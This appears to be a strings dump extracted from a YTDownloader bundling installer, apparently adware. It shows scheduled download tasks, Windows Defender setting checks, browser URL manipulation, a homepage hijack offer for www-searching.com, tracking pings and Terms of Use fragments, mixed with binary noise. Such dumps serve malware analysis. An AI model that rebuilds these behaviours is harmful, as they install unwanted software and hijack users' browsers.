%SystemRoot%\System32\Winevt\Logs\Application.evtx

Event / System[EventID = %d] /Provider[@Name='MsiInstaller']

EvtRender failed with %d

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

%ddd

SB_TASK_%d

CreateTask: Query IExecAction failed

RUNONCE_%d

PT%dS

d-d-dTd:d:d

PT%dH

; UnelevateExecutable: Initialize failed

UNELEVATE_%d

; UnelevateExecutable: CreateTask failed

; UnelevateExecutable: RegisterOnceTask failed

; UnelevateExecutable: Task is still not running after 30 seconds. Task state = %d

%d.%d.%d.%d

Windows NT 6.1

Install.log

@REGKEY

.ReturnCode

cr.exe

%%SBDATE%%

%%SID%%

%%SUB%%

%%FULL_SUB%%

GetXml - Magnet is empty: %s

&ver=%s&are=%s&qre=%s&avre=%s&kbd=%s&tz=%s&pp=%s

GetFile - Failed to connect (Err=%d): %s

GetFile - Failed to connect: %s

GetFile - Get Failed (Err=%d): %s

GetFile - Get Failed: %s

GetFile - Read data Failed (Err=%d): %s

GetFile - Read data failed: %s

Failed to create process file (%x).

Mtx%d

Windows NT 5.1

Windows NT 6.2

Windows NT 6.0

Windows NT 5.0

?prd=%s&aff=%s&ver=%s&rnd=%d&tss=%d&action=%s&actionparam=%s&usid=%s

/p.ashx

Sock_Ping : getaddrinfo error = %d

Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko; SBUA) Chrome/28.0.1500.95 Safari/537.36

GET %s HTTP/1.1

Host: %s

User-Agent: %s

close failed with error: %d

/S /PING /Action=%s /ActionParams=%s /PingParams=%s

/S /MAG=%s /INSTALL /dir=%s /products=%s /pixGuid=%s /sub=%s

ScheduleDownload Initialize Failed: %s

ScheduleDownload CreateTask Failed: %s

Start time: %s. End time: %s.

ScheduleDownload RegisterDailyTask Failed: %s

ScheduleInstaller Initialize Failed: %s

ScheduleInstaller CreateTask Failed: %s

ScheduleInstaller RegisterDailyTask Failed: %s

DeleteScheduleDownload Initialize Failed: %s

DeleteScheduleDownload DeleteTask Failed: %s

\Installer\Install%s_%ld

ShellExecute:

Second shellExecute:

RunAsAdmin failed : shell execute failed

HKEY_LOCAL_MACHINE64

Windows Vista

Windows Server 2008

Windows 7

Windows 8

Windows Server 2008 R2

Web Server Edition

Windows Server 2003 R2,

Windows Storage Server 2003

Windows Home Server

Windows XP Professional x64 Edition

Windows Server 2003,

Web Edition

Windows XP

Windows 2000

(build %d)

FWCMD

GetTimeZoneInformation failed error %d

CInstallerUtils::AccessRegistryKeyValue64Bit Error opening key

CInstallerUtils::AccessRegistryKeyValue64Bit Could not read registry value

SOFTWARE\Microsoft\Windows NT\CurrentVersion

d/d/%d d:d

%d seconds

SUCCESSKEY

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE

REPORT

TSMtx%d

%s /SECONDSTAGE /Mutex=%s /PIXGUID=%s

Error creating shared memory. Err=%d

Error running file: %s

Timeout expired (%d)

Error opening mutex. Err=%d

Return code = %d

Error reading return code. Err=%d

dfb5uyoqjsg4c.cloudfront.net

d1cfk8e4o0c4u2.cloudfront.net

d1vw44q53d84jx.cloudfront.net

Kernel32.dll

Error %d

ACUrl:

ProxyUrl:

ProxyBypass:

Bkernel32.dll

HKEY_USERS

HKEY_CLASSES_ROOT

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

BRWURLS

CInstallMgr::Work, exception: %s

KEYBOARD

XML is incorrect. Xml size=%d. Xml= %s

XML is incorrect. Xml size=%d. Plain Xml= %s

XML %s

bxsdk32.dll

Failed to download bxsdk dll. Error=%d

MINVERURL

REPORT_PROG

/S /REPORT /NUM=%d /AFF=%s

PINGURL

Incorrect xml - No products Node. Xml size=%d

ALTURL

REGKEY

AFFREGKEY

OCSetupHlp.dll

OC_KEY

IMAGE_URL

Cur ver %s, min ver %s

/ENC /S /MAG=%s /INSTALL /dir=%s /products=%s /pixGuid=%s /sub=%s

%d of 1

%d of %d

CInstallMgr::ReportSize

Schedule report failed

SOFTWARE\Microsoft\Windows Defender\Real-Time Protection

SOFTWARE\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction

SOFTWARE\Microsoft\Windows Defender\Signature Updates

SignatureVersion: %s ; RealTimeDisabled %d DownloadDisabled %d RunningDisabled %d ; DefActionSevere %d DefActionHigh %d DefActionMedium %d DefActionLow %d

OpenCandy init failed. Error=%d. Dll path=%s

Failed to download OpenCandy dll. Error=%d

Waited %d seconds

%%successProd%%

%úiledProd%%

Install %s

Set and keep www-searching.com my default search and homepage

By clicking Install, you agree to the <a href="hXXp://VVV.ytdownloader.com/legal/privacy/">Privacy Policy</a> and <a href="hXXp://VVV.ytdownloader.com/legal/terms/">Terms of Service</a>

Link %s

Client for product key 1 loaded.

Client for product key 2 loaded.

Recommended by %s

<a href="%s" id="TOS %s">Terms of Service</a>

<a href="%s" id="Privacy %s">Privacy Policy</a>

Offer %d: Title: %s; Description: %s

Offer %d, Result %d

Exception CHttpDownload::GetNextRange for URL %s

CHttpDownload::Open handle %d to file %s

Failed to open file %s, error = %d

__ERROR CHttpDownload::Read failed for file %s

CHttpDownload::Repot Bytes %I64d ,Total %I64d, by Downloader %d

Range=%I64d RangeReadBytes=%I64d connection %d Error %x

RedownloadRange %s err = %d headers=%s

CHttpDownload::RedownloadRange for URL %s

%sid=%d_r=%lld_err=%d

CHttpDownload::ReportError for URL %s

CHttpDownload::GetNextRange for URL %s

Get Failed : connection %d err %s (0x%X)

CHttpDownload::DownloadNextRange for URL %s

CHttpDownload::Close handle %d to file %s

CHttpDownload::NOT Close handle %d to file %s

CHttpDownload::Work for URL %s

PRESUCCESSKEY

DOWNLOAD START: %s

Download in virtual mode product: %s

Download Failed to createCHttpDownload:

Download Failed to createCHttpDownload: %s

Download - Failed to connect: %s

Download - Get Failed: %s

Http Reply code = %d

Download Failed to create downloaders list: %s

CProductInstaller::Get for product: %s, exception: %s

CProductInstaller::GetNextRange - No Next Range for product %s

CProductInstaller::GetNextRange - product %s start=%I64d end=%I64d size=%I64d

CProductInstaller::Close for Product %s

DownloadMultiConnection:file %s exists on disk %s

DownloadOneConnection FromScheduler : %s

DownloadOneConnection FromScheduler will download: %s, file DOES NOT exist on disk %s

Get failed (DownloadOneConnection): err=%s (0x%X)

Success %s FileSize= %I64d

DownloadMultiConnection FromScheduler : %s

DownloadMultiConnection FromScheduler will download: %s, file DOES NOT exist on disk %s

Get failed (DownloadMultiConnection): err=%s (0x%X)

INSTALL START: %s

/aff=%s /rnd=%d

/rnd=%d

CProductInstaller::InstallProduct for Product %s

DOWNLOAD BYTES: %s NumOfBytes = %I64d

DOWNLOAD NOT COMPLETED: %s

Trying One Connection Fallback: %s

Download failed, error (%x), %s - Trying Multiple Connection Fallback

RunFromScheduler: Trying Main Connection Fallback: %s

Trying main URL in one Connection %s %s

Trying Alternative Connection Fallback: %s

Alternative Connection %s %s

Alternative Connection Failed: %s

Download failed, error (%x), %s %s

Download failed, error (%x), %s

CProductInstaller::OnDownloadNotCompleted for Product %s

OnDownloadCompleted: %s, exiting status %d

status %d, id %d, total bytes %I64d, file size %I64d, %s

DOWNLOAD END: %s %s

%s, %d

DOWNLOAD END: Not all completed %s

%s FileSize= %I64d

CProductInstaller::OnDownloadCompleted for Product %s

INSTALL BEGIN: %s

INSTALL END: %s

CProductInstaller::OnInstallCompleted for Product %s

Install failed, error: %s

%s: %s

CProductInstaller::OnInstallNotCompleted for Product %s

%s - %s

SkipInstall - %s

/S /SCHEDULE /MAG=%s /pn=%s /pixGuid=%s /sub=%s /Reason=%s

CProductInstaller::AddToScheduler for Product %s

CProductInstaller::RemoveFromScheduler for Product %s

RESUCCESSKEY

%s:%s

UI screen timeout - %s

CRandomCondition::IsToInstall value = %s

CRandomCondition::IsToInstall mode result = %d

%d:%d

CRandomCondition::IsToInstall Return %d

CCMDLINE

YTDi 1.0.0.1

1.0.0.1

CrashRpt YTDi 1.0.0.1 Error Report

/INSTALL /dir=%s /products=%s

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

WAdvapi32.dll

By clicking Next, you agree to install %s and agree to the <a id="TOS" href="%s">Terms of Service</a> and <a id="Privacy" href="%s">Privacy Policy</a>.

%s:%s;

RICHED20.DLL

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Content-Type: multipart/form-data; boundary=%s

HTTP/1.1

XXX

Content-Disposition: form-data; name="%s"

HTTP/1.0

Software\Microsoft\Windows\CurrentVersion\Internet Settings

D%sLow\%s\

%s\%s\%s\

%C:\Users\Public\Documents\%s\%s\

%s\Application Data\%s\%s\

[SbTracer::WriteTraceLine] !!! OVERFLOW or FORMAT ERROR !!! - (%d) %s

[SbTracer::ReadConfiguration] Trace Level: %d

[SbTracer::ReadConfiguration] Trace Destination: %d

[SbTracer::ReadConfiguration] Trace Backup: %d

[SbTracer::ReadConfiguration] Trace Time Limit: %d

[SbTracer::ReadConfiguration] Trace Time Stamp: %d

[SbTracer::ReadConfiguration] Trace Max Size: %d

[SbTracer::FormatFilePath] ___Error - GetModuleFileName: %s

[SbTracer::FormatFilePath] ___Warning - No Log folder: %s

[SbTracer::FormatFilePath] ___Error - RecursiveCreateDirectory: %s

[SbTracer::FormatFilePath] Log Path: %s

[SbTracer::RecursiveCreateDirectory] ___Error - Directory: %s

[SbTracer::RecursiveCreateDirectory] ___Error - CreateDirectory: %s

[SbTracer::RecursiveCreateDirectory] Directory: %s

[SbTracer::OpenTraceFile] ___Error: %d, File: %s

[SbTracer::OpenTraceFile] Done %s

[SbTracer::BackupTraceFile] %s

[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegOpenKeyEx

[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegNotifyChangeKeyValue

\StringFileInfo\x\%s

<d/d/%d d:d:d::d 0x%X>

the %s <a href="%s">Terms</a> and <a href="%s">Privacy Policy</a>

@%s?e=%s

zvl=%s&

File open error %d. File=%s

File size is 0. File=%s

Buffer allocation error %d

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}

c:\%original file name%.exe

2.7.0.999

%original file name%.exe_700:

.text

`.rdata

@.data

.rsrc

@.reloc

[email protected]

OtSSh

PSSSSSSh

t!SSh

PSSSSh

j.Yf;

_tcPVj@

.PjRW

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

operator

GetProcessWindowStation

dbghelp.dll

%Y-%m-%dT%H:%M:%SZ

1.3.6.1.4.1.311.2.1.12

Cannot put the trigger ID: %x

{X-hX-hX-XX-XXXXXX}

Host Name: %s

Domain Name: %s

DHCP scope name: %s

GetNetworkParams failed with error: %d

WinHttpGetIEProxyConfigForCurrentUser failed with the following error number:

ERROR_WINHTTP_INTERNAL_ERROR

AutoConfigURL (MyProxyConfig.lpszAutoConfigUrl) is:

AutoConfigURL (MyProxyConfig.lpszProxy) is:

AutoConfigURL (is:

550e832f-a497-4eb7-bb40-8cc856f6d152

RegCreateKeyTransactedW

RegOpenKeyTransactedW

RegDeleteKeyTransactedW

RegDeleteKeyExW

C:\BUILDS\Build_STUB\Installer\Release_YTDK\YTDKi.pdb

GetProcessHeap

KERNEL32.dll

EnumThreadWindows

EnumChildWindows

MsgWaitForMultipleObjectsEx

GetKeyboardLayoutList

USER32.dll

WS2_32.dll

GDI32.dll

RegOpenKeyExW

RegEnumKeyW

RegCloseKey

RegCreateKeyExW

RegDeleteKeyW

RegQueryInfoKeyW

RegEnumKeyExW

RegOpenKeyW

RegNotifyChangeKeyValue

ADVAPI32.dll

ShellExecuteExW

ShellExecuteW

SHELL32.dll

ole32.dll

OLEAUT32.dll

OLEACC.dll

COMCTL32.dll

PSAPI.DLL

CryptMsgClose

CertGetNameStringW

CertFreeCertificateContext

CertFindCertificateInStore

CertCloseStore

CryptMsgGetParam

CRYPT32.dll

VERSION.dll

GetExtendedTcpTable

IPHLPAPI.DLL

WinHttpGetIEProxyConfigForCurrentUser

WINHTTP.dll

SHFileOperationW

RPCRT4.dll

HttpSendRequestExW

HttpSendRequestW

HttpAddRequestHeadersW

HttpQueryInfoW

HttpOpenRequestW

HttpEndRequestW

WININET.dll

GetCPInfo

zcÁ

.?AVChromeBrowserWindow@@

.?AVFirefoxBrowserWindow@@

.?AVOperaBrowserWindow@@

.?AVCHttpFileDownload@@

.?AVCHttpAsync@@

.?AVCHttpDownload@@

.?AVCHttp@@

222222222

55555.ccc

22222222

22222222222

2222222222

222222222222

))aaaaaaaaaaaaa555555.7.??.cccccccAAAAAAAAAAAAA

2222222

..ccc

5.77..Lc7cEEcc7AAATE

|444|44|4

||||4|444

MM.LJ

MMM)MMBMBMBB???BBB??..?....L7.LLLEEEEEATAT

CMIC.CF?

@@,,@@,@@@@

**,,,,@,,@@,,

MMMMMBB???.BB?.7??.7.7LL7.7ELLELL7ETAETTTTT

@@,,@,,,,

MMBB???B?.......777.?.LLLLLLLETT

,,@,,,*,,,*

.hsdy>

,,,,*,,***

,,,@@,**,,,

MBMBBBBBB??????.B??.7c.77.LELL7LEEEL7E

,,****,*

MBMB??BBB???????...??777..LLEL7LAEEcAAATT

,**,,****

B???...7.7.777LLLL7ELAAAAAATAA

BB?.??.....?..LLLELEAAcEAEET

    #    #

B??BBMBB???BB....7777L7.LAATTELE

111111111

11111111111

BBMB?BB????...777.LLLL7LLAET

BB?.?.BBB???...LL7.77LLEEEEELTTTT

RRVVw%%X

#  #1111

BB??..77.7777.777EAEELELET

1111111

11111111

B??BB??..?..7..7L..LLLL

B??B?.B?......?..7.LL7LL

B??.?......LLL..

BB.....77.7LLL..LLEE

MBB??????.7.77.777L

MMBMMB..????....777.LEEE

??7.7.LLLL7LETL

8888888

BB.BB?........L77L

BMMB?B?....777.7.7.EEL

BBB.?B.77.......ETEE

BB.BB........7LLETTT

88888888

B???BB..BB?..7LLLT

BB.??BB..BB..7777L

B???????BB.?...LLLL7

BMB..BB.7.ELLLL77L

BBB??BB.?.LLLL77.

888888888

MBB?....B...cLLLLLLT

___&_&&&

__&&____&

____&___&&

____&__&_&

BM?.BBB?....777L

&&____&__&&__&&____

_&_&&_&&

.njm4tyyxwwwwxyytm3k.

\mbrkBinSub0\msmallFrac0\mdispDef1\mlMargin0\mrMargin0\mdefJc1\mwrapIndent1440\mintLim0\mnaryLim1}{\info{\author udif}{\operator Edith}{\creatim\yr2013\mo10\dy22\hr16\min58}{\revtim\yr2014\mo8\dy24\hr14\min26}{\version5}{\edmins16}{\nofpages4}

{\nofwords2316}{\nofchars13206}{\nofcharsws15492}{\vern57437}}{\*\xmlnstbl {\xmlns1 hXXp://schemas.microsoft.com/office/word/2003/wordml}}\paperw12240\paperh15840\margl1501\margr1502\margt1440\margb1440\gutter0\ltrsect

The following license and terms of use (jointly: "Terms of Use") govern your access and use of the YTDownloader.com website ("Site") and your download, install, access and use of the YTDownloader Browser Application and Add-On ("YTDownloader Add-On") and

ll Site and YTDownloader Add-On contained or displayed information, and any and all available editions, add-ins, tools and documentations, either jointly or separately (collectively and separately known as "YTDownloader"). The Terms of Use are a legally b

ive websites) are each subject to their respective terms and conditions or agreements. Please note that these Terms of Use limit our liability and that we do not provide warranties for YTDownloader or contents. It also limits your remedies.}{\rtlch\fcs1

lely for your private and personal purposes and always in accordance with the Terms and Use and the applicable law. Any other use is prohibited. The use of any software or automated system to extract data from YTDownloader.com or the YTDownloader Add-Ons

is strictly prohibited. You will not disrupt the functioning of the YTDownloader.com or the YTDownloader Add-Ons or otherwise act in a way that interferes with other users\rquote

verse assemble, reverse compile, decompile, disassemble, translate or otherwise alter any executable code, contents or materials on or received via YTDownloader without our prior written consent. You also agree to not remove, obscure, or alter any copyrig

TDownloader temporarily or permanently, with or without notice to you, and are not obligated to support or update the YTDownloader service. You acknowledge and agree that YTDownloader will not be liable to you or any third party in the event that we exerc

\~}{\field{\*\fldinst {\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\insrsid3632102 HYPERLINK "mailto:}{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\insrsid3632102\charrsid3632102 [email protected]}{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

\f31507\fs20\insrsid3632102 " }}{\fldrslt {\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \cs18\f31507\fs20\ul\cf2\insrsid3632102\charrsid16527760 [email protected]}}}\sectd \ltrsect

the Site are based on our best judgment but are subject to a number of uncertainties as well as events beyond our control. You understand and agree that your access and use of the Site and its contents is entirely at your own discretion and at your own ri

\par }{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\cf1\insrsid1449721\charrsid1449721 YTDownloader includes certain marks, graphics, logos, page headers,

, licensors, suppliers and their respective directors, employees, agents a}{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\cf1\insrsid3632102 nd shareholders (jointly: the "}{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

s to accuracy, performance, merchantability, fitness for a particular purpose, and non-infringement. The Goobzo parties, jointly and severally, also disclaim any warranties and liability regarding the accuracy, completeness, security, reliability, timelin

ss, and performance of the YTDownloader, services and contents. Some countries and jurisdictions do not allow the exclusion or disclaimer of certain terms or warranties, so the above exclusions in whole or in part may not apply to you in your country or j

nder applicable law, in no event shall the Goobzo parties be liable for any damage whatsoever including but not limited to any direct, indirect, consequential, special, exemplary, punitive or incidental damages (including but not limited to damages for lo

s of income or profits, business interruption, loss of business information, loss of goodwill or reputation, and the like) whether such claim is based on warranty, contract, tort (including negligence), or otherwise, and even if the Goobzo parties, jointl

urisdictions do not allow the exclusion or disclaimer or limitation of liability of certain types of damages, so the above exclusions may not apply to you in your country or jurisdiction and in such case the aggregate liability of the Goobzo parties shall

responsibilities and liabilities are not on a joint and several basis (i.e. each member of the Goobzo parties shall be solely responsible for the damages and losses caused by such member.\line }{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

You may create links to this Site from other websites in as much as it is clear that we do not endorse you or your activity, business, products or services and that you and us are not affiliated in any way.\line }{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\insrsid3632102\charrsid3632102 [email protected]}{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\insrsid3632102 " }}{\fldrslt {\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

\cs18\f31507\fs20\ul\cf2\insrsid3632102\charrsid16527760 [email protected]}}}\sectd \ltrsect\linex0\headery708\footery708\colsx708\endnhere\sectlinegrid360\sectdefaultcl\sectrsid8879180\sftnbj {\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

\sbasedon0 \snext17 \sunhideused \styrsid5573618 Normal (Web);}{\*\cs18 \additive \rtlch\fcs1 \af0 \ltrch\fcs0 \sbasedon10 \spriority0 \styrsid5573618 apple-converted-space;}{\*\cs19 \additive \rtlch\fcs1 \af0 \ltrch\fcs0 \ul\cf2

\msmallFrac0\mdispDef1\mlMargin0\mrMargin0\mdefJc1\mwrapIndent1440\mintLim0\mnaryLim1}{\info{\author Edith}{\operator Edith}{\creatim\yr2014\mo3\dy24\hr8\min26}{\revtim\yr2014\mo10\dy27\hr12}{\version22}{\edmins1585}{\nofpages3}{\nofwords2318}

{\nofchars13216}{\nofcharsws15503}{\vern57437}}{\*\xmlnstbl {\xmlns1 hXXp://schemas.microsoft.com/office/word/2003/wordml}}\paperw12240\paperh15840\margl1800\margr1800\margt568\margb1440\gutter0\ltrsect

\b\f40\fs16\insrsid11944020\charrsid14186020 \line }{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\insrsid11944020\charrsid14186020 1. Acceptance of Terms of Use\line The following license and terms of use (jointly: "Terms of Use") go}{\rtlch\fcs1

website ("Site") and your download, install, access and use of the YTDownloader Browser Application and Add-On ("YTDownloader Add-On") and all Site and YTDownloader Add-On contained or displayed information, and any and all available editions, add-ins, t

ols and documentations, either jointly or separately (collectively and separately known as "YTDownloader"). The Terms of Use are a legally binding agreement between you, ("you", "visitor" and/or "user"), and Goobzo Ltd. and its affiliates and subsidiaries

r or parts thereof at our sole discretion and without liability. The products and services described on YTDownloader (and their respective websites) are each subject to their respective terms and conditions or agreements. Please note that these Terms of U

ny other use is prohibited. The use of any software or automated system to extract data from YTDownloader.com or the YTDownloader Add-Ons is strictly prohibited. You will not disrupt the functioning of the YTDownloader.com or the YTDownloader Add-Ons or o

py, modify, adapt, distribute, transmit, translate, display or otherwise exploit YTDownloader and you shall not try to reverse engineer, reverse assemble, reverse compile, decompile, disassemble, translate or otherwise alter any executable code, contents

ith or through the Site. We reserve all rights not expressly granted in and to the Site. We reserve the right to terminate your access to YTDownloader temporarily or permanently, with or without notice to you, and are not obligated to support or update th

YTDownloader service. You acknowledge and agree that YTDownloader will not be liable to you or any third party in the event that we exercise our right to modify or terminate access to the YTDownloader service. Unless explicitly stated otherwise, any new

[email protected]}{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\cf1\insrsid3606027 " }{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\cf1\insrsid3886136 {\*\datafield

0000a5ab0000}}}{\fldrslt {\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \cs19\f40\fs16\ul\cf2\insrsid3606027\charrsid2648633 [email protected]}}}\sectd \ltrsect

looking statements made on the Site are based on our best judgment but are subject to a number of uncertainties as well as events beyond our control. You understand and agree that your access and use of the Site and its contents is entirely at your own di

\f40\fs16\cf1\insrsid11944020\charrsid14186020 . Trademarks\line }{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\cf1\insrsid11944020\charrsid425254 YTDownloader includes certain mark

and personal use only with no warranties whatsoever. Goobzo, its affiliates, partners, licensors, suppliers and their respective directors, employees, agents and shareholders (jointly: the " Goobzo parties") do not assume any liability whatsoever and disc

loader and included services and contents, including, without limitation, warranties as to accuracy, performance, merchantability, fitness for a particular purpose, and non-infringement. The Goobzo parties, jointly and severally, also disclaim any warrant

es and liability regarding the accuracy, completeness, security, reliability, timeliness, and performance of the YTDownloader, services and contents. Some countries and jurisdictions do not allow the exclusion or disclaimer of certain terms or warranties,

, exemplary, punitive or incidental damages (including but not limited to damages for loss of income or profits, business interruption, loss of business information, loss of goodwill or reputation, and the like) whether such claim is based on warranty, co

tract, tort (including negligence), or otherwise, and even if the Goobzo parties, jointly or separately, have been advised of the possibility of such damages or loss. Such limitation of liability shall also apply whether the damages arise from use, misuse

t of personal injury or death arising from the negligence of Goobzo. Some countries and jurisdictions do not allow the exclusion or disclaimer or limitation of liability of certain types of damages, so the above exclusions may not apply to you in your cou

While these limitations of liability provisions use the Goobzo parties definition, the responsibilities and liabilities are not on a joint and several basis (i.e. each member of the Goobzo parties shall be solely responsible for the damages and losses ca

\par 1}{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\cf1\insrsid11944020 1}{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\cf1\insrsid11944020\charrsid14186020 . Links to this Site\line You may create links to this Site from other websites in a

Failure or delay of Goobzo exercise any right, power or remedy under or to require or enforce strict performance by you of any provision of th

\ltrch\fcs0 \f40\fs16\insrsid11944020\charrsid413544 HYPERLINK "mailto:[email protected]" }{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\insrsid11944020\charrsid413544 {\*\datafield

0000a5ab00000066000100d9}}}{\fldrslt {\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \cs19\f40\fs16\ul\cf2\insrsid11944020\charrsid413544 [email protected]}}}\sectd \ltrsect

\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Top of Form;\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Bottom of Form;\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 Normal (Web);\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Acronym;

\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Keyboard;\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Preformatted;\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Sample;\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Typewriter;

<requestedExecutionLevel level='asInvoker' uiAccess='false' />

<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*' />

5$535;5|5

7$7-747]7

78b8s8y8

;#;,;8;=;

8"8(8,82868

3*5{5`6{6

6%7u7

2/3u3

5$6(6,60646

8 8$8(8,8084888<8@8

5 5$5(5,5

7 7$7(7,7074787 ;$;(;,;0;4;8;<;@;

2 202<2\2|2

60686@6\6|6

> ><>@>`>

?(?4?<?\?

8(848<8\8

mscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

portuguese-brazilian

USER32.DLL

Invalid parameter or key doesn't exist.

Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CString class.

The flag CR_INST_STORE_ZIP_ARCHIVES should be used with CR_INST_DONT_SEND_REPORT flag.

%s %s Error Report

CrashSender.exe is not found in the specified path.

crashrpt_lang.ini

l%s\CrashRpt\UnsentCrashReports\%s_%s

Couldn't create crash report directory.

Couldn't set C   exception handlers for main execution thread.

Couldn't launch CrashSender.exe process.

%s-tmp

Local\CrashRptEvent_%s_2

The operation was cancelled by client.

Error launching CrashSender.exe

%s has stopped working

Invalid registry key or invalid destination file is specified.

HKEY_LOCAL_MACHINE\

HKEY_CURRENT_USER\

Empty subkey is not allowed.

The registry key coudn't be open.

Local\CrashRptEvent_%s

%s\%s_%s\%s

%u.%u.%u.%u

chrome.exe

iexplore.exe

firefox.exe

safari.exe

opera.exe

explorer.exe

chrome

firefox

opera

@Google Chrome

Chrome_WidgetWin_1

chrome://settings-frame/#syi516

ChromeGetUrl::Initialize ReRun

ChromeGetUrl Done

ChromeGetUrl::BuildChromeHandles found window class name: %s

ChromeGetUrl::BuildChromeHandles HWNDS: %s

ChromeGetUrl::BuildChromeHandles Could not find Chrome windows, exiting..

%d secs

Name - %s

Value - %s

https

URL: %s changed to: %s

Adding URL:

Adding URL: %s

@Firefox

FirefoxBrowserWindow Found button window, 0x%x

FirefoxBrowserWindow Found browser window, 0x%x

IE9BrowserWindow Found button window, 0x%x

IE9BrowserWindow Found browser window, 0x%x

@Opera

OperaBrowserWindow Found button window, 0x%x

OperaBrowserWindow Found browser window, 0x%x

SafariBrowserWindow Found button window, 0x%x

SafariBrowserWindow Found browser window, 0x%x

ESOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy

GetModule failed. Err=%d

OpenProcess failed. Err=%d

JCertGetNameString failed.

CryptDecodeObject failed with %x

CryptQueryObject failed with %x

CryptMsgGetParam failed with %x

Program Name : %s

Publisher Link : %s

MoreInfo Link : %s

CertFindCertificateInStore failed with %x

CBOT_Condition::IsToInstall Return %d

[CEventsThread::AddEvent] ___Error invalid event handle %d

[CEventsThread::AddEvent] ___Warning event handle already exists %d

[CEventsThread::CreateNamedEvent] ___Error CreateEvent. LE: %d. Try OpenEvent...

[CEventsThread::CreateNamedEvent] ___Error OpenEvent: LE: %d

[CEventsThread::CreateNamedEvent] OpenEvent. LE: %d

[CEventsThread::SetTimeoutResolution] From: %d -> To: %d

[CEventsThread::Cleanup] Closing Handle: %d

[CEventsThread::Cleanup] ___Error CloseHandle(0x%p) failed: %d

[CEventsThread::AlertEvent] ___Error Not found Event: %d

[CEventsThread::AlertEvent] ___Error Invalid Event Entry: %d

[CEventsThread::AlertEvent] ___Error SetEvent failed: %d

[CEventsThread::SetGlobalEvent] Event: %d

[CEventsThread::SetGlobalEvent] ___Error Not found Event: %d

[CEventsThread::SetGlobalEvent] ___Error Invalid Event Entry: %d

[CEventsThread::RemoveEvent] Event: %d

[CEventsThread::RemoveEvent] ___Error Not found Event: %d

[CEventsThread::RemoveEvent] ___Error Invalid Event Entry: %d

[CEventsThread::RemoveEvent] ___Error CloseHandle failed: %d

[CEventsThread::ResetEvent] Event: %d

[CEventsThread::ResetEvent] ___Error Not found Event: %d

[CEventsThread::ResetEvent] ___Error Invalid Event Entry: %d

[CEventsThread::ResetEvent] ___Error ResetEvent failed: %d

[CEventsThread::WaitEvent] TID=%X

[CEventsThread::WaitForMultipleEvents] TID=%X

[CEventsThread::WaitForMultipleEvents] ___Error MsgWaitForMultipleObjectsEx. LE: %d

[CEventsThread::WaitForMultipleEvents] Released on Timeout: %d ms

[CEventsThread::WaitForMultipleEvents] Released on Signaled: %d ms

[CEventsThread::Start] ___Error - Failed to create thread: %X

[CEventsThread::Start - Leave] TID=%X

[CEventsThread::Stop - Enter] TID=%X

[CEventsThread::Stop - Leave] TID=%X

[CEventsThread::Work] TID=%X

[CEventsThread::Work] WAIT_ABANDONED - %d

[CEventsThread::Work] TID=%X - Exit !!!

[CEventsThread::CallProcessTimeoutRoutines] ___Error Invalid Event Entry: %d, Timeout: %d

[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Index: %d

[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Entry: %d

Your %s is almost ready for use.

Click YES on the next screen to allow %s to complete integration.

wevtapi.dll

%SystemRoot%\System32\Winevt\Logs\Application.evtx

Event / System[EventID = %d] /Provider[@Name='MsiInstaller']

EvtRender failed with %d

